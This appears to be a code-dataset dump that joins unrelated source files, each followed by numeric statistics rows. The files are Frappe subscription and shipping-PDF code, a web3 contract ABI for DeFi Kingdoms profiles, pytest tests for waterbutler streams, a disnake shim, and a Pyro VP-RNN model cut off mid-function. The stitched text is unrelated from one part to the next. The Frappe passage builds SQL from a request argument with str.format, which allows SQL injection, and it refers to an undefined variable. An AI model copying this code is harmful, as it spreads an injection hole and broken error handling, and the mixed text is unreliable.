begleit_row.abo = inland_data.abo
begleit_row.anz = inland_data.anz
begleit_row.recipient_contact = inland_data.recipient_contact
begleit_row.recipient_address = inland_data.recipient_address
rm_log.save(ignore_permissions=True)
frappe.db.commit()
rm_log.ende = now()
rm_log.status = 'PDF erstellt'
rm_log.qty_one = qty_one
rm_log.qty_multi = qty_multi
rm_log.save(ignore_permissions=True)
frappe.db.commit()
def create_begleitschreiben_jahres_abo():
qty_one = 0
qty_multi = 0
rm_log = frappe.get_doc({
"doctype": "RM Log",
'start': now(),
'status': 'Job gestartet',
'typ': 'Begleitschreiben: Jahres-Abo Empfänger Ausland'
})
rm_log.insert()
frappe.db.commit()
ausland_datas = frappe.db.sql("""
SELECT
`view`.`abo` AS `abo`,
`view`.`anz` AS `anz`,
`view`.`recipient_name` AS `recipient_name`,
`view`.`recipient_contact` AS `recipient_contact`,
`view`.`recipient_address` AS `recipient_address`
FROM (
SELECT
`parent` AS `abo`,
`magazines_qty_mr` AS `anz`,
`magazines_recipient` AS `recipient_name`,
`recipient_contact` AS `recipient_contact`,
`recipient_address` AS `recipient_address`
FROM `tabmp Abo Recipient`
WHERE `parent` IN (
SELECT
`name`
FROM `tabmp Abo`
WHERE `status` = 'Active'
AND `type` = 'Jahres-Abo'
)
AND `recipient_address` IN (SELECT `name` FROM `tabAddress` WHERE `country` != 'Schweiz')
AND `remove_recipient` IS NULL
) AS `view`
ORDER BY `view`.`anz` ASC
""", as_dict=True)
for ausland_data in ausland_datas:
if ausland_data.anz == 1:
qty_one += 1
else:
qty_multi += 1
begleit_row = rm_log.append('begleitungen', {})
customer_name = frappe.get_doc("Customer", ausland_data.recipient_name).customer_name
begleit_row.recipient_name = customer_name
begleit_row.recipient_customer = ausland_data.recipient_name
# tbd!
begleit_row.pdf = 1
#---------------------
begleit_row.drucken = 1
begleit_row.abo = ausland_data.abo
begleit_row.anz = ausland_data.anz
begleit_row.recipient_contact = ausland_data.recipient_contact
begleit_row.recipient_address = ausland_data.recipient_address
rm_log.save(ignore_permissions=True)
frappe.db.commit()
rm_log.ende = now()
rm_log.status = 'PDF erstellt'
rm_log.qty_one = qty_one
rm_log.qty_multi = qty_multi
rm_log.save(ignore_permissions=True)
frappe.db.commit()
qty_one = 0
qty_multi = 0
rm_log = frappe.get_doc({
"doctype": "RM Log",
'start': now(),
'status': 'Job gestartet',
'typ': 'Begleitschreiben: Jahres-Abo Empfänger Inland'
})
rm_log.insert()
frappe.db.commit()
inland_datas = frappe.db.sql("""
SELECT
`view`.`abo` AS `abo`,
`view`.`anz` AS `anz`,
`view`.`recipient_name` AS `recipient_name`,
`view`.`recipient_contact` AS `recipient_contact`,
`view`.`recipient_address` AS `recipient_address`
FROM (
SELECT
`parent` AS `abo`,
`magazines_qty_mr` AS `anz`,
`magazines_recipient` AS `recipient_name`,
`recipient_contact` AS `recipient_contact`,
`recipient_address` AS `recipient_address`
FROM `tabmp Abo Recipient`
WHERE `parent` IN (
SELECT
`name`
FROM `tabmp Abo`
WHERE `status` = 'Active'
AND `type` = 'Jahres-Abo'
)
AND `recipient_address` IN (SELECT `name` FROM `tabAddress` WHERE `country` = 'Schweiz')
AND `remove_recipient` IS NULL
) AS `view`
ORDER BY `view`.`anz` ASC
""", as_dict=True)
for inland_data in inland_datas:
if inland_data.anz == 1:
qty_one += 1
else:
qty_multi += 1
begleit_row = rm_log.append('begleitungen', {})
customer_name = frappe.get_doc("Customer", inland_data.recipient_name).customer_name
begleit_row.recipient_name = customer_name
begleit_row.recipient_customer = inland_data.recipient_name
# tbd!
begleit_row.pdf = 1
#---------------------
begleit_row.drucken = 1
begleit_row.abo = inland_data.abo
begleit_row.anz = inland_data.anz
begleit_row.recipient_contact = inland_data.recipient_contact
begleit_row.recipient_address = inland_data.recipient_address
rm_log.save(ignore_permissions=True)
frappe.db.commit()
rm_log.ende = now()
rm_log.status = 'PDF erstellt'
rm_log.qty_one = qty_one
rm_log.qty_multi = qty_multi
rm_log.save(ignore_permissions=True)
frappe.db.commit()
@frappe.whitelist()
def create_versandkarten(date):
args = {
'date': date
}
enqueue("mietrechtspraxis.mietrechtspraxis.page.invoice_and_print.invoice_and_print._create_versandkarten", queue='long', job_name='Generierung Sammel-PDF (Versandkarten)', timeout=5000, **args)
def _create_versandkarten(date):
data = []
qty_one = 0
qty_multi = 0
rm_log = frappe.get_doc({
"doctype": "RM Log",
'start': now(),
'status': 'Job gestartet',
'typ': 'Versandkarten'
})
rm_log.insert()
frappe.db.commit()
bind_source = "/assets/mietrechtspraxis/sinvs_for_print/{date}.pdf".format(date=rm_log.name)
physical_path = "/home/frappe/frappe-bench/sites" + bind_source
dest=str(physical_path)
output = PdfFileWriter()
ausland_empfaenger = frappe.db.sql("""
SELECT
`view`.`recipient`,
`view`.`abo`,
`view`.`anz`,
`view`.`recipient_contact`,
`view`.`recipient_address`
FROM (
SELECT
`tabmp Abo`.`invoice_recipient` AS `recipient`,
`tabmp Abo`.`name` AS `abo`,
`tabmp Abo`.`magazines_qty_ir` AS `anz`,
`tabmp Abo`.`recipient_contact`,
`tabmp Abo`.`recipient_address`
FROM `tabmp Abo`
WHERE
(`tabmp Abo`.`status` = 'Active' OR (`tabmp Abo`.`status` = 'Actively terminated' AND `tabmp Abo`.`end_date` <= '{date}'))
AND `tabmp Abo`.`recipient_address` IN (SELECT `name` FROM `tabAddress` WHERE `country` != 'Schweiz')
AND `tabmp Abo`.`magazines_qty_ir` > 0
UNION
SELECT
`tabmp Abo Recipient`.`magazines_recipient` AS `recipient`,
`tabmp Abo Recipient`.`parent` AS `abo`,
`tabmp Abo Recipient`.`magazines_qty_mr` AS `anz`,
`tabmp Abo Recipient`.`recipient_contact`,
`tabmp Abo Recipient`.`recipient_address`
FROM `tabmp Abo Recipient`
WHERE `tabmp Abo Recipient`.`recipient_address` IN (SELECT `name` FROM `tabAddress` WHERE `country` != 'Schweiz')
AND `tabmp Abo Recipient`.`parent` IN (
SELECT
`name`
FROM `tabmp Abo`
WHERE `tabmp Abo`.`status` = 'Active' OR (`tabmp Abo`.`status` = 'Actively terminated' AND `tabmp Abo`.`end_date` <= '{date}')
)
AND `tabmp Abo Recipient`.`magazines_qty_mr` > 0
) AS `view`
ORDER BY `view`.`anz` ASC
""".format(date=date), as_dict=True)
for empfaenger in ausland_empfaenger:
# create rm_log:
try:
customer = frappe.get_doc("Customer", empfaenger.recipient)
versand_row = rm_log.append('versandkarten', {})
versand_row.recipient_name = customer.customer_name
versand_row.abo = empfaenger.abo
versand_row.anz = empfaenger.anz
versand_row.recipient_contact = empfaenger.recipient_contact
versand_row.recipient_address = empfaenger.recipient_address
rm_log.save(ignore_permissions=True)
frappe.db.commit()
if empfaenger.anz > 1:
qty_multi += 1
else:
qty_one += 1
except:
frappe.log_error(frappe.get_traceback(), 'create rm_log failed: {ref_dok}'.format(ref_dok=ausland_abo.name))
inland_empfaenger = frappe.db.sql("""
SELECT
`view`.`recipient`,
`view`.`abo`,
`view`.`anz`,
`view`.`recipient_contact`,
`view`.`recipient_address`
FROM (
SELECT
`tabmp Abo`.`invoice_recipient` AS `recipient`,
`tabmp Abo`.`name` AS `abo`,
`tabmp Abo`.`magazines_qty_ir` AS `anz`,
`tabmp Abo`.`recipient_contact`,
`tabmp Abo`.`recipient_address`
FROM `tabmp Abo`
WHERE
(`tabmp Abo`.`status` = 'Active' OR (`tabmp Abo`.`status` = 'Actively terminated' AND `tabmp Abo`.`end_date` <= '{date}'))
AND `tabmp Abo`.`recipient_address` IN (SELECT `name` FROM `tabAddress` WHERE `country` = 'Schweiz')
UNION
SELECT
`tabmp Abo Recipient`.`magazines_recipient` AS `recipient`,
`tabmp Abo Recipient`.`parent` AS `abo`,
`tabmp Abo Recipient`.`magazines_qty_mr` AS `anz`,
`tabmp Abo Recipient`.`recipient_contact`,
`tabmp Abo Recipient`.`recipient_address`
FROM `tabmp Abo Recipient`
WHERE `tabmp Abo Recipient`.`recipient_address` IN (SELECT `name` FROM `tabAddress` WHERE `country` = 'Schweiz')
AND `tabmp Abo Recipient`.`parent` IN (
SELECT
`name`
FROM `tabmp Abo`
WHERE `tabmp Abo`.`status` = 'Active' OR (`tabmp Abo`.`status` = 'Actively terminated' AND `tabmp Abo`.`end_date` <= '{date}')
)
) AS `view`
ORDER BY `view`.`anz` ASC
""".format(date=date), as_dict=True)
for empfaenger in inland_empfaenger:
# create rm_log:
try:
customer = frappe.get_doc("Customer", empfaenger.recipient)
versand_row = rm_log.append('versandkarten', {})
versand_row.recipient_name = customer.customer_name
versand_row.abo = empfaenger.abo
versand_row.anz = empfaenger.anz
versand_row.recipient_contact = empfaenger.recipient_contact
versand_row.recipient_address = empfaenger.recipient_address
rm_log.save(ignore_permissions=True)
frappe.db.commit()
if empfaenger.anz > 1:
qty_multi += 1
else:
qty_one += 1
except:
frappe.log_error(frappe.get_traceback(), 'create rm_log failed: {ref_dok}'.format(ref_dok=ausland_abo.name))
try:
output = frappe.get_print("RM Log", rm_log.name, 'RM Log Versandkarten', as_pdf = True, output = output, no_letterhead = 1, ignore_zugferd=True)
except:
frappe.log_error(frappe.get_traceback(), 'print_pdf failed: {ref_dok}'.format(ref_dok=rm_log.name))
try:
if isinstance(dest, str): # when dest is a file path
destdir = os.path.dirname(dest)
if destdir != '' and not os.path.isdir(destdir):
os.makedirs(destdir)
with open(dest, "wb") as w:
output.write(w)
else: # when dest is io.IOBase
output.write(dest)
except:
frappe.log_error(frappe.get_traceback(), 'save_pdf failed: {ref_dok}'.format(ref_dok=rm_log.name))
rm_log.ende = now()
rm_log.qty_one = qty_one
rm_log.qty_multi = qty_multi
rm_log.status = 'PDF erstellt'
rm_log.save(ignore_permissions=True)
frappe.db.commit()
| 48.642019 | 360 | 0.493763 | 3,942 | 41,443 | 4.944191 | 0.064181 | 0.024115 | 0.020318 | 0.019702 | 0.84705 | 0.82391 | 0.808466 | 0.791124 | 0.782504 | 0.767111 | 0 | 0.00458 | 0.409937 | 41,443 | 851 | 361 | 48.699177 | 0.792427 | 0.01373 | 0 | 0.777487 | 0 | 0.034031 | 0.547106 | 0.054549 | 0 | 0 | 0 | 0 | 0 | 1 | 0.015707 | false | 0 | 0.013089 | 0 | 0.034031 | 0.024869 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
94f4d1ddf7a9df3e3373ad79f2df6e98f77591ed | 11,529 | py | Python | profile/profile_v2.py | sodapopinsky/dfk | be48e89d4b054ad8abbb009d0e1ea4c10f559af5 | [
"MIT"
] | 90 | 2021-10-17T19:36:45.000Z | 2022-03-31T17:19:43.000Z | profile/profile_v2.py | sodapopinsky/dfk | be48e89d4b054ad8abbb009d0e1ea4c10f559af5 | [
"MIT"
] | 13 | 2021-11-13T00:19:31.000Z | 2022-03-20T15:13:22.000Z | profile/profile_v2.py | sodapopinsky/dfk | be48e89d4b054ad8abbb009d0e1ea4c10f559af5 | [
"MIT"
] | 71 | 2021-11-05T03:00:41.000Z | 2022-03-30T06:16:25.000Z | from web3 import Web3
CONTRACT_ADDRESS = '0x6391F796D56201D279a42fD3141aDa7e26A3B4A5'
ABI = """
[
{"anonymous":false,"inputs":[{"indexed":false,"internalType":"address","name":"owner","type":"address"},{"indexed":false,"internalType":"string","name":"name","type":"string"},{"indexed":false,"internalType":"uint64","name":"created","type":"uint64"},{"indexed":false,"internalType":"uint256","name":"nftId","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"collectionId","type":"uint256"}],"name":"ProfileCreated","type":"event"},
{"anonymous":false,"inputs":[{"indexed":false,"internalType":"address","name":"owner","type":"address"},{"indexed":false,"internalType":"string","name":"name","type":"string"},{"indexed":false,"internalType":"uint256","name":"nftId","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"collectionId","type":"uint256"}],"name":"ProfileUpdated","type":"event"},
{"anonymous":false,"inputs":[{"indexed":true,"internalType":"bytes32","name":"role","type":"bytes32"},{"indexed":true,"internalType":"bytes32","name":"previousAdminRole","type":"bytes32"},{"indexed":true,"internalType":"bytes32","name":"newAdminRole","type":"bytes32"}],"name":"RoleAdminChanged","type":"event"},
{"anonymous":false,"inputs":[{"indexed":true,"internalType":"bytes32","name":"role","type":"bytes32"},{"indexed":true,"internalType":"address","name":"account","type":"address"},{"indexed":true,"internalType":"address","name":"sender","type":"address"}],"name":"RoleGranted","type":"event"},
{"anonymous":false,"inputs":[{"indexed":true,"internalType":"bytes32","name":"role","type":"bytes32"},{"indexed":true,"internalType":"address","name":"account","type":"address"},{"indexed":true,"internalType":"address","name":"sender","type":"address"}],"name":"RoleRevoked","type":"event"},
{"inputs":[],"name":"DEFAULT_ADMIN_ROLE","outputs":[{"internalType":"bytes32","name":"","type":"bytes32"}],"stateMutability":"view","type":"function"},
{"inputs":[],"name":"MAX_CHAR","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},
{"inputs":[],"name":"MAX_PIC","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},
{"inputs":[],"name":"MIN_CHAR","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},
{"inputs":[],"name":"MODERATOR_ROLE","outputs":[{"internalType":"bytes32","name":"","type":"bytes32"}],"stateMutability":"view","type":"function"},
{"inputs":[],"name":"UPDATER_ROLE","outputs":[{"internalType":"bytes32","name":"","type":"bytes32"}],"stateMutability":"view","type":"function"},
{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"addressToProfile","outputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"string","name":"name","type":"string"},{"internalType":"uint64","name":"created","type":"uint64"},{"internalType":"uint256","name":"nftId","type":"uint256"},{"internalType":"uint256","name":"collectionId","type":"uint256"},{"internalType":"string","name":"picUri","type":"string"}],"stateMutability":"view","type":"function"},
{"inputs":[{"internalType":"string[]","name":"_uriArray","type":"string[]"}],"name":"batchSetPicURI","outputs":[],"stateMutability":"nonpayable","type":"function"},
{"inputs":[{"internalType":"address","name":"_profileAddress","type":"address"},{"internalType":"string","name":"_name","type":"string"}],"name":"changeName","outputs":[],"stateMutability":"nonpayable","type":"function"},
{"inputs":[{"internalType":"address","name":"_profileAddress","type":"address"},{"internalType":"uint256","name":"_nftId","type":"uint256"},{"internalType":"uint256","name":"_collectionId","type":"uint256"}],"name":"changePic","outputs":[],"stateMutability":"nonpayable","type":"function"},
{"inputs":[{"internalType":"string","name":"_name","type":"string"},{"internalType":"uint256","name":"_nftId","type":"uint256"},{"internalType":"uint256","name":"_collectionId","type":"uint256"}],"name":"createProfile","outputs":[],"stateMutability":"nonpayable","type":"function"},
{"inputs":[{"internalType":"address","name":"_profileAddress","type":"address"}],"name":"getProfile","outputs":[{"components":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"string","name":"name","type":"string"},{"internalType":"uint64","name":"created","type":"uint64"},{"internalType":"uint256","name":"nftId","type":"uint256"},{"internalType":"uint256","name":"collectionId","type":"uint256"},{"internalType":"string","name":"picUri","type":"string"}],"internalType":"struct ProfileTypes.Profile","name":"","type":"tuple"}],"stateMutability":"view","type":"function"},
{"inputs":[{"internalType":"address","name":"_profileAddress","type":"address"}],"name":"getProfileByAddress","outputs":[{"internalType":"uint256","name":"_id","type":"uint256"},{"internalType":"address","name":"_owner","type":"address"},{"internalType":"string","name":"_name","type":"string"},{"internalType":"uint64","name":"_created","type":"uint64"},{"internalType":"uint8","name":"_picId","type":"uint8"},{"internalType":"uint256","name":"_heroId","type":"uint256"},{"internalType":"uint256","name":"_points","type":"uint256"}],"stateMutability":"view","type":"function"},
{"inputs":[{"internalType":"string","name":"_name","type":"string"}],"name":"getProfileByName","outputs":[{"components":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"string","name":"name","type":"string"},{"internalType":"uint64","name":"created","type":"uint64"},{"internalType":"uint256","name":"nftId","type":"uint256"},{"internalType":"uint256","name":"collectionId","type":"uint256"},{"internalType":"string","name":"picUri","type":"string"}],"internalType":"struct ProfileTypes.Profile","name":"","type":"tuple"}],"stateMutability":"view","type":"function"},
{"inputs":[{"internalType":"bytes32","name":"role","type":"bytes32"}],"name":"getRoleAdmin","outputs":[{"internalType":"bytes32","name":"","type":"bytes32"}],"stateMutability":"view","type":"function"},
{"inputs":[{"internalType":"address","name":"_profileAddress","type":"address"},{"internalType":"uint256","name":"_collectionId","type":"uint256"}],"name":"getTokenUrisHeldByAddress","outputs":[{"internalType":"string[]","name":"","type":"string[]"}],"stateMutability":"view","type":"function"},
{"inputs":[{"internalType":"bytes32","name":"role","type":"bytes32"},{"internalType":"address","name":"account","type":"address"}],"name":"grantRole","outputs":[],"stateMutability":"nonpayable","type":"function"},
{"inputs":[{"internalType":"bytes32","name":"role","type":"bytes32"},{"internalType":"address","name":"account","type":"address"}],"name":"hasRole","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},
{"inputs":[],"name":"heroesNftContract","outputs":[{"internalType":"contract IHeroCore","name":"","type":"address"}],"stateMutability":"view","type":"function"},
{"inputs":[],"name":"identityTokenRouter","outputs":[{"internalType":"contract IIdentityTokenRouter","name":"","type":"address"}],"stateMutability":"view","type":"function"},
{"inputs":[{"internalType":"address","name":"_heroCoreAddress","type":"address"},{"internalType":"address","name":"_identityTokenRouter","type":"address"}],"name":"initialize","outputs":[],"stateMutability":"nonpayable","type":"function"},
{"inputs":[],"name":"maxChar","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},
{"inputs":[],"name":"maxPic","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},
{"inputs":[],"name":"minChar","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},
{"inputs":[{"internalType":"string","name":"","type":"string"}],"name":"nameToAddress","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},
{"inputs":[{"internalType":"uint256","name":"","type":"uint256"}],"name":"picUris","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},
{"inputs":[{"internalType":"bytes32","name":"role","type":"bytes32"},{"internalType":"address","name":"account","type":"address"}],"name":"renounceRole","outputs":[],"stateMutability":"nonpayable","type":"function"},
{"inputs":[{"internalType":"bytes32","name":"role","type":"bytes32"},{"internalType":"address","name":"account","type":"address"}],"name":"revokeRole","outputs":[],"stateMutability":"nonpayable","type":"function"},
{"inputs":[{"internalType":"address","name":"_address","type":"address"}],"name":"setHeroes","outputs":[],"stateMutability":"nonpayable","type":"function"},
{"inputs":[{"internalType":"address","name":"_identityTokenRouter","type":"address"}],"name":"setIdentityTokenRouter","outputs":[],"stateMutability":"nonpayable","type":"function"},
{"inputs":[{"internalType":"uint8","name":"_min","type":"uint8"},{"internalType":"uint8","name":"_max","type":"uint8"}],"name":"setNameLengths","outputs":[],"stateMutability":"nonpayable","type":"function"},
{"inputs":[{"internalType":"uint8","name":"_max","type":"uint8"}],"name":"setPicMax","outputs":[],"stateMutability":"nonpayable","type":"function"},
{"inputs":[{"internalType":"uint256","name":"_picId","type":"uint256"},{"internalType":"string","name":"_picUri","type":"string"}],"name":"setPicURI","outputs":[],"stateMutability":"nonpayable","type":"function"},
{"inputs":[{"components":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"string","name":"name","type":"string"},{"internalType":"uint64","name":"created","type":"uint64"},{"internalType":"uint256","name":"nftId","type":"uint256"},{"internalType":"uint256","name":"collectionId","type":"uint256"},{"internalType":"string","name":"picUri","type":"string"}],"internalType":"struct ProfileTypes.Profile[]","name":"_profiles","type":"tuple[]"}],"name":"setProfiles","outputs":[],"stateMutability":"nonpayable","type":"function"},
{"inputs":[{"internalType":"bytes4","name":"interfaceId","type":"bytes4"}],"name":"supportsInterface","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"}
]
"""
def get_profile(address, rpc_address):
w3 = Web3(Web3.HTTPProvider(rpc_address))
contract_address = Web3.toChecksumAddress(CONTRACT_ADDRESS)
contract = w3.eth.contract(contract_address, abi=ABI)
contract_entry = contract.functions.getProfileByAddress(Web3.toChecksumAddress(address)).call()
profile = {}
profile['id'] = contract_entry[0]
profile['address'] = str(contract_entry[1])
profile['name'] = contract_entry[2]
profile['creation_time'] = contract_entry[3]
profile['pic_id'] = contract_entry[4]
profile['hero_id'] = contract_entry[5]
profile['points'] = contract_entry[6]
return profile
| 172.074627 | 613 | 0.639951 | 1,062 | 11,529 | 6.894539 | 0.111111 | 0.057088 | 0.083584 | 0.094237 | 0.804015 | 0.793909 | 0.770418 | 0.716198 | 0.683966 | 0.612401 | 0 | 0.02549 | 0.05742 | 11,529 | 66 | 614 | 174.681818 | 0.648293 | 0 | 0 | 0 | 0 | 0.666667 | 0.942493 | 0.890537 | 0 | 0 | 0.003643 | 0 | 0 | 1 | 0.016667 | false | 0 | 0.016667 | 0 | 0.05 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
94fb40bc37df44000ff662a4b6c5c155c3fb2da0 | 4,679 | py | Python | tests/core/streams/test_file.py | KakeruMizuno/RDM-waterbutler | 58ecd801385a7572d1ed56568a31f701291c4e3e | [
"Apache-2.0"
] | 65 | 2015-01-23T03:22:04.000Z | 2022-01-11T22:33:19.000Z | tests/core/streams/test_file.py | cslzchen/waterbutler | e4e07727e06885a752c9251e5731f5627f646da3 | [
"Apache-2.0"
] | 300 | 2015-02-16T16:45:02.000Z | 2022-01-31T14:49:07.000Z | tests/core/streams/test_file.py | cslzchen/waterbutler | e4e07727e06885a752c9251e5731f5627f646da3 | [
"Apache-2.0"
] | 76 | 2015-01-20T20:45:17.000Z | 2021-07-30T13:18:10.000Z | import os
import pytest
from waterbutler.core import streams
DUMMY_FILE = os.path.join(os.path.dirname(__file__), 'fixtures/dummy.txt')
class TestFileStreamReader:
@pytest.mark.asyncio
async def test_file_stream_reader(self):
with open(DUMMY_FILE, 'r') as fp:
reader = streams.FileStreamReader(fp)
assert reader.size == 27
data = await reader.read()
assert data == 'abcdefghijklmnopqrstuvwxyz\n'
at_eof = reader.at_eof()
assert not at_eof
data = await reader.read()
assert data == b''
at_eof = reader.at_eof()
assert at_eof
reader.close()
at_eof = reader.at_eof()
assert at_eof
with pytest.raises(ValueError):
fp.read()
@pytest.mark.asyncio
async def test_file_stream_reader_after_seek(self):
with open(DUMMY_FILE, 'r') as fp:
fp.seek(3)
reader = streams.FileStreamReader(fp)
assert reader.size == 27 # still gives full size
assert fp.tell() == 3 # returns to original seek position
data = await reader.read()
assert data == 'abcdefghijklmnopqrstuvwxyz\n' # always reads full data
at_eof = reader.at_eof()
assert not at_eof
data = await reader.read()
assert data == b''
at_eof = reader.at_eof()
assert at_eof
@pytest.mark.asyncio
async def test_file_stream_reader_subset(self):
with open(DUMMY_FILE, 'r') as fp:
reader = streams.FileStreamReader(fp)
data = await reader.read(10)
assert data == 'abcdefghij'
at_eof = reader.at_eof()
assert not at_eof
data = await reader.read(2)
assert data == 'kl'
at_eof = reader.at_eof()
assert not at_eof
data = await reader.read()
assert data == 'mnopqrstuvwxyz\n'
at_eof = reader.at_eof()
assert not at_eof
data = await reader.read()
assert data == b''
at_eof = reader.at_eof()
assert at_eof
class TestPartialFileStreamReader:
@pytest.mark.asyncio
@pytest.mark.parametrize("byte_range,size,is_partial,content_range,expected", [
((0, 26), 27, False, 'bytes 0-26/27', 'abcdefghijklmnopqrstuvwxyz\n'),
((0, 5), 6, True, 'bytes 0-5/27', 'abcdef'),
((2, 10), 9, True, 'bytes 2-10/27', 'cdefghijk'),
((20, 26), 7, True, 'bytes 20-26/27', 'uvwxyz\n'),
((2, 2), 1, True, 'bytes 2-2/27', 'c'),
])
async def test_partial_file_stream_reader(self, byte_range, size, is_partial, content_range,
expected):
with open(DUMMY_FILE, 'r') as fp:
reader = streams.PartialFileStreamReader(fp, byte_range)
assert reader.size == size
assert reader.total_size == 27
assert reader.partial == is_partial
assert reader.content_range == content_range
data = await reader.read()
assert data == expected
at_eof = reader.at_eof()
assert not at_eof
data = await reader.read()
assert data == b''
at_eof = reader.at_eof()
assert at_eof
@pytest.mark.asyncio
@pytest.mark.parametrize("byte_range,size,is_partial,content_range,expected", [
((0, 26), 27, False, 'bytes 0-26/27', 'abcdefghijklmnopqrstuvwxyz\n'),
((0, 5), 6, True, 'bytes 0-5/27', 'abcdef'),
((2, 10), 9, True, 'bytes 2-10/27', 'cdefghijk'),
((20, 26), 7, True, 'bytes 20-26/27', 'uvwxyz\n'),
((2, 2), 1, True, 'bytes 2-2/27', 'c'),
])
async def test_partial_file_stream_reader_with_size(self, byte_range, size, is_partial,
content_range, expected):
"""Test that range is respected even when large size values are passed to ``.read()``."""
with open(DUMMY_FILE, 'r') as fp:
reader = streams.PartialFileStreamReader(fp, byte_range)
assert reader.size == size
assert reader.total_size == 27
assert reader.partial == is_partial
assert reader.content_range == content_range
data = await reader.read(500)
assert data == expected
at_eof = reader.at_eof()
assert not at_eof
data = await reader.read(500)
assert data == b''
at_eof = reader.at_eof()
assert at_eof
| 34.404412 | 97 | 0.554606 | 565 | 4,679 | 4.428319 | 0.173451 | 0.077938 | 0.061551 | 0.067546 | 0.822942 | 0.822942 | 0.822942 | 0.820544 | 0.728217 | 0.644285 | 0 | 0.034427 | 0.335756 | 4,679 | 135 | 98 | 34.659259 | 0.770592 | 0.01667 | 0 | 0.785047 | 0 | 0 | 0.096939 | 0.046584 | 0 | 0 | 0 | 0 | 0.336449 | 1 | 0 | false | 0 | 0.028037 | 0 | 0.046729 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
bf51c6f01e2f5c6f4b5df6e5b912c5eadf16555f | 136 | py | Python | discord/types/appinfo.py | kuzaku-developers/disnake | 61cc1ad4c2bafd39726a1447c85f7e469e41af10 | [
"MIT"
] | null | null | null | discord/types/appinfo.py | kuzaku-developers/disnake | 61cc1ad4c2bafd39726a1447c85f7e469e41af10 | [
"MIT"
] | null | null | null | discord/types/appinfo.py | kuzaku-developers/disnake | 61cc1ad4c2bafd39726a1447c85f7e469e41af10 | [
"MIT"
] | null | null | null | from disnake.types.appinfo import *
from disnake.types.appinfo import __dict__ as __original_dict__
locals().update(__original_dict__)
| 27.2 | 63 | 0.838235 | 18 | 136 | 5.555556 | 0.555556 | 0.22 | 0.32 | 0.46 | 0.58 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.088235 | 136 | 4 | 64 | 34 | 0.806452 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.666667 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
bf9783400806f1042c4a360b97fe30441d77d115 | 11,532 | py | Python | src/algos/vprnn.py | abacoelho/variational-poisson-rnn | abf77f79fc64be75ae9102ec8d537f77ed9c5f8f | [
"MIT"
] | 5 | 2021-08-23T15:47:26.000Z | 2022-03-25T21:13:53.000Z | src/algos/vprnn.py | abacoelho/variational-poisson-rnn | abf77f79fc64be75ae9102ec8d537f77ed9c5f8f | [
"MIT"
] | null | null | null | src/algos/vprnn.py | abacoelho/variational-poisson-rnn | abf77f79fc64be75ae9102ec8d537f77ed9c5f8f | [
"MIT"
] | 2 | 2021-12-08T13:24:43.000Z | 2022-02-15T19:20:55.000Z | """
VP-RNN
-------
This file contains the VP-RNN and MOVP-RNN specifications. In particular, we implement:
(1) Emitter
Parametrizes the conditional output distribution p(x_t | \lambda_t) in the generative model (Eq.11, Section 3.2.4)
(2) Encoder:
Parametrizes encoder network p(\lambda_t | h^q_t) for posterior inference (Eq.11, Section 3.2.4)
(3) VPRNN:
(Single output) Variational Poisson-RNN (Section 3.2.4)
(4) MOVPRR:
Multi-Output Variational Poisson-RNN (Section 4.1)
"""
import torch
from torch import nn
# pyro imports
import pyro
from pyro.infer import SVI, Trace_ELBO, Predictive
from pyro.optim import Adam, ClippedAdam
import pyro.distributions as dist
import pyro.poutine as poutine
from src.misc.utils import Trace_ELBO_Wrapper
class Emitter(nn.Module):
def __init__(self, input_dim, hidden_dim, output_dim):
super(Emitter, self).__init__()
# initialize linear transformations
self.lin_input_to_hidden = nn.Linear(input_dim, hidden_dim)
self.lin_hidden_to_hidden = nn.Linear(hidden_dim, hidden_dim)
self.lin_hidden_to_loc = nn.Linear(hidden_dim, output_dim)
self.lin_hidden_to_scale = nn.Linear(hidden_dim, output_dim)
# initialize non-linearities
self.relu = nn.ReLU()
self.dropout = nn.Dropout(p=0.1)
self.softplus = nn.Softplus()
def forward(self, x):
h = self.relu(self.lin_input_to_hidden(x))
